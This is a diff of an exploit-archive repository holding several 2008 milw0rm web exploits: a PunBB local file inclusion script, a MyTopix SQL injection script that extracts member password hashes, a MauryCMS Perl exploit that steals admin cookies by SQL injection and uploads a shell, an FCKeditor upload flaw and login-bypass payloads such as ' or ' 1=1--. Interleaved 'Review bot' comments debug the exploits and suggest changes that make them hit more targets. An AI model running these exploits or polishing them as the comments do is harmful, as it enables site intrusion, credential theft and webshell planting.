@@ -1,49 +1,49 @@ -######################################################################## -# -# Yellow Flood Organization -# -# Alex News-engine (fckeditor) Arbitrary File Upload -# -# Source: http://www.alexscriptengine.de/blog/category/news-engine/ -# -# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/ -# -# Discover by: Batter -# -######################################################################## - - - -#################### -- Vulnerability: -#################### - -/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ - -#################### -- Exploit: -#################### - -http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html - -#################### -- how To use: -#################### - -http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.* - -#################### -- Solution: -#################### - -Restrict and grant only trusted users access to the resources. 
- -#################### -- Greets : -#################### - -THE.HACKER.ONE , Str0ke - -#################### - -# milw0rm.com [2008-11-19] +######################################################################## +# +# Yellow Flood Organization +# +# Alex News-engine (fckeditor) Arbitrary File Upload +# +# Source: http://www.alexscriptengine.de/blog/category/news-engine/ +# +# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/ +# +# Discover by: Batter +# +######################################################################## + + + +#################### +- Vulnerability: +#################### + +/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ + +#################### +- Exploit: +#################### + +http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html + +#################### +- how To use: +#################### + +http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.* + +#################### +- Solution: +#################### + +Restrict and grant only trusted users access to the resources. + +#################### +- Greets : +#################### + +THE.HACKER.ONE , Str0ke + +#################### + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7159.php b/platforms/php/webapps/7159.php index 77d575b8c..41daca9cb 100755 --- a/platforms/php/webapps/7159.php +++ b/platforms/php/webapps/7159.php 
@@ -1,283 +1,283 @@ -starting(); -$exploit->is_vulnerable($domain); -$exploit->exploiting($domain,$mymode); - - - -class Exploit -{ - - function http_request($host,$data) - { - - if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) - { - echo "socket_create() error!\r\n"; - exit; - } - if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) - { - echo "socket_set_option() error!\r\n"; - exit; - } - - if(!socket_connect($socket,$host,80)) - { - echo "socket_connect() error!\r\n"; - exit; - } - if(!socket_write($socket,$data,strlen($data))) - { - echo "socket_write() errror!\r\n"; - exit; - } - - while($get = socket_read($socket,1024,PHP_NORMAL_READ)) - { - $content .= $get; - } - - socket_close($socket); - - - $array = array( - 'HTTP/1.1 404 Not Found', - 'HTTP/1.1 300 Multiple Choices', - 'HTTP/1.1 301 Moved Permanently', - 'HTTP/1.1 302 Found', - 'HTTP/1.1 304 Not Modified', - 'HTTP/1.1 400 Bad Request', - 'HTTP/1.1 401 Unauthorized', - 'HTTP/1.1 402 Payment Required', - 'HTTP/1.1 403 Forbidden', - 'HTTP/1.1 405 Method Not Allowed', - 'HTTP/1.1 406 Not Acceptable', - 'HTTP/1.1 407 Proxy Authentication Required', - 'HTTP/1.1 408 Request Timeout', - 'HTTP/1.1 409 Conflict', - 'HTTP/1.1 410 Gone', - 'HTTP/1.1 411 Length Required', - 'HTTP/1.1 412 Precondition Failed', - 'HTTP/1.1 413 Request Entity Too Large', - 'HTTP/1.1 414 Request-URI Too Long', - 'HTTP/1.1 415 Unsupported Media Type', - 'HTTP/1.1 416 Request Range Not Satisfiable', - 'HTTP/1.1 417 Expectation Failed', - 'HTTP/1.1 Retry With', - ); - - - for($i=0;$i<=count($array);$i++) - - if(eregi($array[$i],$content)) - { - return ("$array[$i]\r\n"); - break; - } - else - { - return ("$content\r\n"); - break; - } - } - - - function is_vulnerable($host) - { - $host = explode('/',$host); - - $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n"; - $header .= "Host: $host[0]\r\n"; - $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; - $header .= "Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; - $header .= "Accept-Language: en-us,en;q=0.5\r\n"; - $header .= "Accept-Encoding: gzip,deflate\r\n"; - $header .= "Connection: close\r\n\r\n"; - - if(stristr($this->http_request($host[0],$header),"\\'")) - { - echo "[+] Magic Quotes GPC/Register Globals On!\n"; - echo "[+] Exploit Failed!\n"; - exit; - } - else - { - return false; - } - } - - function starting() - { - - global $argv; - - if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) - { - - echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n"; - echo "[+] by athos - staker[at]hotmail[dot]it\r\n"; - echo " -----------------------------------------------------------\r\n"; - echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n"; - echo "[+] Usage: php $argv[0] [host/path] [save]\r\n"; - echo "[+] Usage: php $argv[0] [host/path] \r\n"; - exit; - - } - } - - function exploiting($host,$mode) - { - - $host = explode('/',$host); - $i = 0; - - - echo "[+] Local File (ex: ../../etc/passwd%00)\r\n"; - echo "[+] Local File: "; - - $file = stripslashes(trim(fgets(STDIN))); - - if(empty($file)) die("you fail"); - - - $array = array ( - "functions_navlinks.php?pun_user[language]=$file", - "profile_send.php?pun_user[language]=$file", - "viewtopic_PM-link.php?pun_user[language]=$file", - "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file", - ); - - $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n"; - $write .= "Host: $host[0]\r\n"; - $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; - $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; - $write .= "Accept-Language: en-us,en;q=0.5\r\n"; - $write .= "Accept-Encoding: gzip,deflate\r\n"; - $write .= "Connection: close\r\n\r\n"; - - - - - if(stristr($this->http_request($host[0],$write),'No such file or directory in')) - { - $i++; - } - else - { - if($mode == "save") - { - - 
$rand = rand(0,99999); - fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); - - echo "[+] File $rand Saved Successfully!\r\n"; - echo "[+] Exploit Terminated!\r\n"; - exit; - - } - else - { - echo $this->http_request($host[0],$write); - exit; - } - } - } -} - -# milw0rm.com [2008-11-19] +starting(); +$exploit->is_vulnerable($domain); +$exploit->exploiting($domain,$mymode); + + + +class Exploit +{ + + function http_request($host,$data) + { + + if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) + { + echo "socket_create() error!\r\n"; + exit; + } + if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) + { + echo "socket_set_option() error!\r\n"; + exit; + } + + if(!socket_connect($socket,$host,80)) + { + echo "socket_connect() error!\r\n"; + exit; + } + if(!socket_write($socket,$data,strlen($data))) + { + echo "socket_write() errror!\r\n"; + exit; + } + + while($get = socket_read($socket,1024,PHP_NORMAL_READ)) + { + $content .= $get; + } + + socket_close($socket); + + + $array = array( + 'HTTP/1.1 404 Not Found', + 'HTTP/1.1 300 Multiple Choices', + 'HTTP/1.1 301 Moved Permanently', + 'HTTP/1.1 302 Found', + 'HTTP/1.1 304 Not Modified', + 'HTTP/1.1 400 Bad Request', + 'HTTP/1.1 401 Unauthorized', + 'HTTP/1.1 402 Payment Required', + 'HTTP/1.1 403 Forbidden', + 'HTTP/1.1 405 Method Not Allowed', + 'HTTP/1.1 406 Not Acceptable', + 'HTTP/1.1 407 Proxy Authentication Required', + 'HTTP/1.1 408 Request Timeout', + 'HTTP/1.1 409 Conflict', + 'HTTP/1.1 410 Gone', + 'HTTP/1.1 411 Length Required', + 'HTTP/1.1 412 Precondition Failed', + 'HTTP/1.1 413 Request Entity Too Large', + 'HTTP/1.1 414 Request-URI Too Long', + 'HTTP/1.1 415 Unsupported Media Type', + 'HTTP/1.1 416 Request Range Not Satisfiable', + 'HTTP/1.1 417 Expectation Failed', + 'HTTP/1.1 Retry With', + ); + + + for($i=0;$i<=count($array);$i++) + + if(eregi($array[$i],$content)) + { + return ("$array[$i]\r\n"); + break; + } + else + { + return ("$content\r\n"); 
+ break; + } + } + + + function is_vulnerable($host) + { + $host = explode('/',$host); + + $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n"; + $header .= "Host: $host[0]\r\n"; + $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; + $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; + $header .= "Accept-Language: en-us,en;q=0.5\r\n"; + $header .= "Accept-Encoding: gzip,deflate\r\n"; + $header .= "Connection: close\r\n\r\n"; + + if(stristr($this->http_request($host[0],$header),"\\'")) + { + echo "[+] Magic Quotes GPC/Register Globals On!\n"; + echo "[+] Exploit Failed!\n"; + exit; + } + else + { + return false; + } + } + + function starting() + { + + global $argv; + + if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) + { + + echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n"; + echo "[+] by athos - staker[at]hotmail[dot]it\r\n"; + echo " -----------------------------------------------------------\r\n"; + echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n"; + echo "[+] Usage: php $argv[0] [host/path] [save]\r\n"; + echo "[+] Usage: php $argv[0] [host/path] \r\n"; + exit; + + } + } + + function exploiting($host,$mode) + { + + $host = explode('/',$host); + $i = 0; + + + echo "[+] Local File (ex: ../../etc/passwd%00)\r\n"; + echo "[+] Local File: "; + + $file = stripslashes(trim(fgets(STDIN))); + + if(empty($file)) die("you fail"); + + + $array = array ( + "functions_navlinks.php?pun_user[language]=$file", + "profile_send.php?pun_user[language]=$file", + "viewtopic_PM-link.php?pun_user[language]=$file", + "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file", + ); + + $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n"; + $write .= "Host: $host[0]\r\n"; + $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; + $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; + 
$write .= "Accept-Language: en-us,en;q=0.5\r\n"; + $write .= "Accept-Encoding: gzip,deflate\r\n"; + $write .= "Connection: close\r\n\r\n"; + + + + + if(stristr($this->http_request($host[0],$write),'No such file or directory in')) + { + $i++; + } + else + { + if($mode == "save") + { + + $rand = rand(0,99999); + fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); + + echo "[+] File $rand Saved Successfully!\r\n"; + echo "[+] Exploit Terminated!\r\n"; + exit; + + } + else + { + echo $this->http_request($host[0],$write); + exit; + } + } + } +} + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7160.php b/platforms/php/webapps/7160.php index 677982c49..251d8d9ee 100755 --- a/platforms/php/webapps/7160.php +++ b/platforms/php/webapps/7160.php 
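Review bot: Only the first of the four include paths is ever requested: `exploiting()` builds `$write` once from `$array[$i]` with `$i = 0`, and the `$i++` executed on a "No such file or directory" response is not inside any loop, so the profile_send.php, viewtopic_PM-link.php and header_new_messages.php variants are dead code. The status-code loop in `http_request()` has the same shape, both the `if` and the `else` return on the first iteration, so only the `404 Not Found` entry is ever compared (and `eregi` no longer exists in PHP 7). `starting()` also uses `/` as the delimiter in `'/http://(.+?)$/'`, so preg_match fails with an unknown-modifier warning and the usage check effectively fires only on an empty argument; `'#^http://#'` would work. The hunk spans the whole file, though its opening (`starting();`) looks truncated in this rendering, presumably the `<?php` prologue and object creation were lost in extraction.
```php
    function exploiting($host,$mode)
    {
        $host = explode('/',$host);
        // … unchanged: prompt for $file and build $array …
        foreach($array as $path)
        {
            $write  = "GET /$host[1]/files/include/pms/$path HTTP/1.1\r\n";
            // … unchanged: remaining request headers …
            $resp = $this->http_request($host[0],$write);
            if(stristr($resp,'No such file or directory in')) continue;
            // … unchanged: save or print $resp, then exit …
        }
        echo "[-] No vulnerable include path found\r\n";
    }
```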
@@ -1,148 +1,148 @@ - evil = ''; - $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - $this -> inj = '-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=2--'; - } - - private function send($packet) - { - if(!$this -> socket) $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - - socket_connect($this -> socket, gethostbyname($this -> host), 80) or die("[-] Couldn't connect with specified host\r\n"); - socket_write($this -> socket, $packet, strlen($packet)) or die("[-] Couldn't send requrested packet\r\n"); - - while($resp = socket_read($this -> socket, 2048)) $output .= $resp; - - socket_shutdown($this -> socket, 2); - socket_close($this -> socket); - unset($this -> socket); - - return $output; - } - - public function target($host, $path) - { - $this -> host = (substr($host, 0, 7) === 'http://') ? substr($host, 7) : $host; - $this -> path = (substr($path, -1) === '/') ? substr($path, 0, -1) : $path; - } - - public function usage() - { - return "[~] Usage : php mytopix130-sql.php \r\n\r\n"; - } - - public function login($login, $password) - { - $post = "username=$login&password=$password&hash=5aaaea2d9cd5b549a857e02190cb4542"; - $this -> evil = - "POST {$this -> path}/index.php?a=logon&CODE=01 HTTP/1.1\r\n" . - "Host: {$this -> host}\r\n" . - "Referer: http://{$this -> host}{$this -> path}\r\n" . - "User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" . - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*#/*;q=0.8\r\n" . - "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . - "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . - "Connection: Close\r\n" . - "Content-Type: application/x-www-form-urlencoded\r\n" . - "Content-length: " . strlen($post) . "\r\n\r\n$post"; - - return $this -> send($this -> evil); - } - - public function inject($cid, $cpass) - { - $this -> evil = - "GET {$this->path}/index.php?a=notes&CODE=07&send=$this->inj HTTP/1.1\r\n" . 
- "Host: {$this->host}\r\n" . - "Referer: http://{$this->host}{$this->path}/\r\n" . - "User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" . - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" . - "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . - "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . - "Cookie: my_id={$cid}; my_pass={$cpass}\r\n" . - "Connection: close\r\n\r\n"; - - return $this -> send($this -> evil); - } -}; - - -$xpl = new MyTopixSploit(); - -echo <<< HEADER - -+--------------------------------------------------------------------------+ -| | -| MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit | -| ========================================================== | -| Author ......................................... cOndemned | -| Contact ...................... digital_future[at]p2[dot]pl | -| Conditions ......................... Need account on forum | -| | -+--------------------------------------------------------------------------+ - - -HEADER; - -if($argc != 5) - echo $xpl -> usage(); -else -{ - list($script, $host, $path, $login, $password) = $argv; - - $xpl -> target($host, $path); - $head = $xpl -> login($login, $password); - - printf("[~] Trying to login with nick: %s, and password: %s...\r\n", $login, $password); - - $cookie['USERID'] = preg_match_all('!id=([0-9]+);!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user id\r\n"); - $cookie['PASSWD'] = preg_match_all('!pass=([a-f0-9]{32});!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user password\r\n"); - - $src = $xpl -> inject($cookie['USERID'], $cookie['PASSWD']); - - printf("[~] Sending packet ...\r\n"); - - $resp = preg_match_all("!value='([a-z0-9]+?):([a-f0-9]+?)'!is", $src, $out) - ? 
"[+] Login: {$out[1][0]}\r\n[+] Pass: {$out[2][0]}" : "[-] Exploitation failed"; - - printf("[~] Done...\r\n%s \r\n\r\n", $resp); -} - -?> - -# milw0rm.com [2008-11-19] + evil = ''; + $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + $this -> inj = '-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=2--'; + } + + private function send($packet) + { + if(!$this -> socket) $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + + socket_connect($this -> socket, gethostbyname($this -> host), 80) or die("[-] Couldn't connect with specified host\r\n"); + socket_write($this -> socket, $packet, strlen($packet)) or die("[-] Couldn't send requrested packet\r\n"); + + while($resp = socket_read($this -> socket, 2048)) $output .= $resp; + + socket_shutdown($this -> socket, 2); + socket_close($this -> socket); + unset($this -> socket); + + return $output; + } + + public function target($host, $path) + { + $this -> host = (substr($host, 0, 7) === 'http://') ? substr($host, 7) : $host; + $this -> path = (substr($path, -1) === '/') ? substr($path, 0, -1) : $path; + } + + public function usage() + { + return "[~] Usage : php mytopix130-sql.php \r\n\r\n"; + } + + public function login($login, $password) + { + $post = "username=$login&password=$password&hash=5aaaea2d9cd5b549a857e02190cb4542"; + $this -> evil = + "POST {$this -> path}/index.php?a=logon&CODE=01 HTTP/1.1\r\n" . + "Host: {$this -> host}\r\n" . + "Referer: http://{$this -> host}{$this -> path}\r\n" . + "User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" . + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*#/*;q=0.8\r\n" . + "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . + "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . + "Connection: Close\r\n" . + "Content-Type: application/x-www-form-urlencoded\r\n" . + "Content-length: " . strlen($post) . 
"\r\n\r\n$post"; + + return $this -> send($this -> evil); + } + + public function inject($cid, $cpass) + { + $this -> evil = + "GET {$this->path}/index.php?a=notes&CODE=07&send=$this->inj HTTP/1.1\r\n" . + "Host: {$this->host}\r\n" . + "Referer: http://{$this->host}{$this->path}/\r\n" . + "User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" . + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" . + "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . + "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . + "Cookie: my_id={$cid}; my_pass={$cpass}\r\n" . + "Connection: close\r\n\r\n"; + + return $this -> send($this -> evil); + } +}; + + +$xpl = new MyTopixSploit(); + +echo <<< HEADER + ++--------------------------------------------------------------------------+ +| | +| MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit | +| ========================================================== | +| Author ......................................... cOndemned | +| Contact ...................... digital_future[at]p2[dot]pl | +| Conditions ......................... Need account on forum | +| | ++--------------------------------------------------------------------------+ + + +HEADER; + +if($argc != 5) + echo $xpl -> usage(); +else +{ + list($script, $host, $path, $login, $password) = $argv; + + $xpl -> target($host, $path); + $head = $xpl -> login($login, $password); + + printf("[~] Trying to login with nick: %s, and password: %s...\r\n", $login, $password); + + $cookie['USERID'] = preg_match_all('!id=([0-9]+);!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user id\r\n"); + $cookie['PASSWD'] = preg_match_all('!pass=([a-f0-9]{32});!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user password\r\n"); + + $src = $xpl -> inject($cookie['USERID'], $cookie['PASSWD']); + + printf("[~] Sending packet ...\r\n"); + + $resp = preg_match_all("!value='([a-z0-9]+?):([a-f0-9]+?)'!is", $src, $out) + ? 
"[+] Login: {$out[1][0]}\r\n[+] Pass: {$out[2][0]}" : "[-] Exploitation failed"; + + printf("[~] Done...\r\n%s \r\n\r\n", $resp); +} + +?> + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7162.pl b/platforms/php/webapps/7162.pl index 15a2b37de..59f654481 100755 --- a/platforms/php/webapps/7162.pl +++ b/platforms/php/webapps/7162.pl 
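Review bot: The injection targets a fixed row, `members_id=2` is hard-coded in `$this->inj`, so the exploit dumps exactly one account and nothing on the command line lets the operator pick another; an extra argument fed to the constructor as `sprintf('-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=%d--', $id)` would fix that, with the `$argc != 5` guard moving to 6. The `Accept:` header in `login()` reads `*#/*;q=0.8`, a typo for `*/*` that a strict server may reject, whereas `inject()` sends it correctly. The hard-coded `hash=5aaaea2d9cd5b549a857e02190cb4542` POST field is presumably a form token from the tested install and likely differs elsewhere; that deserves a comment. The class starts at `evil = '';` in this rendering, so the `<?php`, `class MyTopixSploit` line and constructor header appear to have been lost in extraction rather than omitted from the hunk.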
@@ -1,108 +1,108 @@ -#!/usr/bin/perl - -=about - - MauryCMS <= 0.53.2 Remote Shell Upload Exploit - ---------------------------------------------- - by athos - staker[at]hotmail[dot]it - download on http://cms.maury91.org - thnx Osirys - -=cut - - -use strict; -use warnings; -use LWP::UserAgent; - -my ($http,$post,$user,$pass,@auth,@read,$shell); - -my $host = shift @ARGV; -my $file = shift @ARGV or &usage; - -open(FILE,$file) or die("file error!\n"); - -@read = ; - -foreach(@read) -{ - $shell .= $_; -} - -close(FILE); - -&usage if $host !~ /http:\/\/(.+?)$/i && $file !~ /[a-zA-Z](\.php)/i; - - -my @path = split /\//,substr($host,7); - - -$http = new LWP::UserAgent( - agent => "Mozilla/4.5 [en] (Win95; U)", - ); - -@auth = split(':',get_cookies()); - -if(not defined($path[1])) -{ - $user = qq{_nick=${auth[1]}; path=/; }; - $pass = qq{_sauth=${auth[0]}; path=/;}; -} -else -{ - $user = qq{/${path[1]}_nick=${auth[1]}; path=/; }; - $pass = qq{/${path[1]}_sauth=${auth[0]}; path=/;}; -} - - - -$http->default_header('Cookie' => $user.$pass); - -$post = $http->post($host.'/Admin.php',[ - 'zone' => 'Modify', - 'txtfname' => $file, - 'txttext' => $shell, - ]); - -if($post->is_success && $post->as_string =~ /File Scritto/i) -{ - print STDOUT "Exploit Successfully!\n"; - print STDOUT "$host/$file\n"; - exit; -} -else -{ - print STDOUT "Exploit Failed!\n"; - exit; -} - - -sub get_cookies -{ - my ($query,$cookie,$content); - - $query = "/Rss.php?c=-1+union+select+1,concat(sauth,0x3a,nick),". - "3,4,5,6,7,8,9+from+mcms_users+where+id=1--"; - - - $cookie = $http->get($host.$query); - $content = $cookie->content; - - if($cookie->is_success & $content =~ /(.+?)<\/title>/i) - { - return $1; - } -} - - -sub usage -{ - print STDOUT "MauryCMS <= 0.53.2 Remote Shell Upload Exploit\n". - "by athos - staker[at]hotmail[dot]it\n". - "----------------------------------------------\n". - "Usage: perl $0 http://[host] [name_shell.php]\n". 
- "Usage: perl $0 http://localhost/cms shell.php\n"; - exit; -} - -# milw0rm.com [2008-11-19] +#!/usr/bin/perl + +=about + + MauryCMS <= 0.53.2 Remote Shell Upload Exploit + ---------------------------------------------- + by athos - staker[at]hotmail[dot]it + download on http://cms.maury91.org + thnx Osirys + +=cut + + +use strict; +use warnings; +use LWP::UserAgent; + +my ($http,$post,$user,$pass,@auth,@read,$shell); + +my $host = shift @ARGV; +my $file = shift @ARGV or &usage; + +open(FILE,$file) or die("file error!\n"); + +@read = <FILE>; + +foreach(@read) +{ + $shell .= $_; +} + +close(FILE); + +&usage if $host !~ /http:\/\/(.+?)$/i && $file !~ /[a-zA-Z](\.php)/i; + + +my @path = split /\//,substr($host,7); + + +$http = new LWP::UserAgent( + agent => "Mozilla/4.5 [en] (Win95; U)", + ); + +@auth = split(':',get_cookies()); + +if(not defined($path[1])) +{ + $user = qq{_nick=${auth[1]}; path=/; }; + $pass = qq{_sauth=${auth[0]}; path=/;}; +} +else +{ + $user = qq{/${path[1]}_nick=${auth[1]}; path=/; }; + $pass = qq{/${path[1]}_sauth=${auth[0]}; path=/;}; +} + + + +$http->default_header('Cookie' => $user.$pass); + +$post = $http->post($host.'/Admin.php',[ + 'zone' => 'Modify', + 'txtfname' => $file, + 'txttext' => $shell, + ]); + +if($post->is_success && $post->as_string =~ /File Scritto/i) +{ + print STDOUT "Exploit Successfully!\n"; + print STDOUT "$host/$file\n"; + exit; +} +else +{ + print STDOUT "Exploit Failed!\n"; + exit; +} + + +sub get_cookies +{ + my ($query,$cookie,$content); + + $query = "/Rss.php?c=-1+union+select+1,concat(sauth,0x3a,nick),". + "3,4,5,6,7,8,9+from+mcms_users+where+id=1--"; + + + $cookie = $http->get($host.$query); + $content = $cookie->content; + + if($cookie->is_success & $content =~ /<title>(.+?)<\/title>/i) + { + return $1; + } +} + + +sub usage +{ + print STDOUT "MauryCMS <= 0.53.2 Remote Shell Upload Exploit\n". + "by athos - staker[at]hotmail[dot]it\n". + "----------------------------------------------\n". 
+ "Usage: perl $0 http://[host] [name_shell.php]\n".
+ "Usage: perl $0 http://localhost/cms shell.php\n";
+ exit;
+}
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7163.txt b/platforms/php/webapps/7163.txt
index 16dfb53a8..475ccbd0a 100755
--- a/platforms/php/webapps/7163.txt
+++ b/platforms/php/webapps/7163.txt
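Review bot: The argument check `&usage if $host !~ /http:\/\/(.+?)$/i && $file !~ /[a-zA-Z](\.php)/i;` only bails when both arguments are malformed, so a host given without the `http://` prefix together with a valid `.php` name proceeds into `substr($host,7)` and mangles the target; it should be `||`. `get_cookies()` returns undef when the Rss.php injection yields no `<title>`, and `split(':', get_cookies())` then silently produces empty `_nick`/`_sauth` cookies and the POST to Admin.php runs unauthenticated; `my $c = get_cookies(); defined $c or die "cookie extraction failed\n";` before the split would make that failure visible. In the same sub, `$cookie->is_success & $content =~ ...` uses the bitwise `&` where `&&` is meant. The hunk covers the whole script; the bare `@read = ;` on the old side is just `<FILE>` being eaten by the rendering, not a real change.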
@@ -1,26 +1,26 @@ -############################################################################################### -[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability -[+] Script home : http://www.revsense.com/ -[-] Discovered By : d3b4g -[-] Greetz : str0ke /* All my freind -################################################################################################ - - Dork:Powered by Revsense - - Go to www.target.com/index.php?section=user&action=login - - Use following information to bypass login. - - Write any email Address as email address.It must to be in email format. - - For exapmple bla@bla.com - - For password use ' or ' 1=1 - - Live demo [at] http://demo.revsense.com/index.php?section=user&action=login --------------------------------------------- --------------------------------------------- -I'm a maldivian -/* - -# milw0rm.com [2008-11-19] +############################################################################################### +[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability +[+] Script home : http://www.revsense.com/ +[-] Discovered By : d3b4g +[-] Greetz : str0ke /* All my freind +################################################################################################ + + Dork:Powered by Revsense + + Go to www.target.com/index.php?section=user&action=login + + Use following information to bypass login. + + Write any email Address as email address.It must to be in email format. + + For exapmple bla@bla.com + + For password use ' or ' 1=1 + + Live demo [at] http://demo.revsense.com/index.php?section=user&action=login +-------------------------------------------- +-------------------------------------------- +I'm a maldivian +/* + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7164.txt b/platforms/php/webapps/7164.txt index e240182d1..ae5baa15c 100755 --- a/platforms/php/webapps/7164.txt +++ b/platforms/php/webapps/7164.txt 
@@ -1,42 +1,42 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ -[~]Tybe: (Auth Bypass) SQL Injection Vulnerability - -[~]Vendor:http://www.preproject.com/preaspjobboard.asp - -[~]Software: PRE JOB BOARD - -[~]author: R3d-D3v!L - -[~] Date: 21.11.2008 - -[~] Home: www.ahacker.biz - -[~] contact: N/A -[~] ----------------------------------------------------------- - - -[~] Exploit: - -username: r0' or ' 1=1-- -password: r0' or ' 1=1-- - - -[~] login for demo: - -http://preproject.com/preaspjobboard//Employee/emp_login.asp - - -[~]-------------------------------------------------------------------------------- -[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker -[~] -[~]spechial thanks : dolly & 7am3m & عماد ,الزهيري -[~] -[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion -[~] -[~] & xp10.biz & ahacker.biz -[~] -[~]-------------------------------------------------------------------------------- - - - -# milw0rm.com [2008-11-19] +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~]Tybe: (Auth Bypass) SQL Injection Vulnerability + +[~]Vendor:http://www.preproject.com/preaspjobboard.asp + +[~]Software: PRE JOB BOARD + +[~]author: R3d-D3v!L + +[~] Date: 21.11.2008 + +[~] Home: www.ahacker.biz + +[~] contact: N/A +[~] ----------------------------------------------------------- + + +[~] Exploit: + +username: r0' or ' 1=1-- +password: r0' or ' 1=1-- + + +[~] login for demo: + +http://preproject.com/preaspjobboard//Employee/emp_login.asp + + +[~]-------------------------------------------------------------------------------- +[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker +[~] +[~]spechial thanks : dolly & 7am3m & عماد ,الزهيري +[~] +[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion +[~] +[~] & xp10.biz & ahacker.biz +[~] +[~]-------------------------------------------------------------------------------- + + + +# milw0rm.com [2008-11-19] 
diff --git a/platforms/php/webapps/7165.pl b/platforms/php/webapps/7165.pl
index 26de97a75..3e1cc6216 100755
--- a/platforms/php/webapps/7165.pl
+++ b/platforms/php/webapps/7165.pl
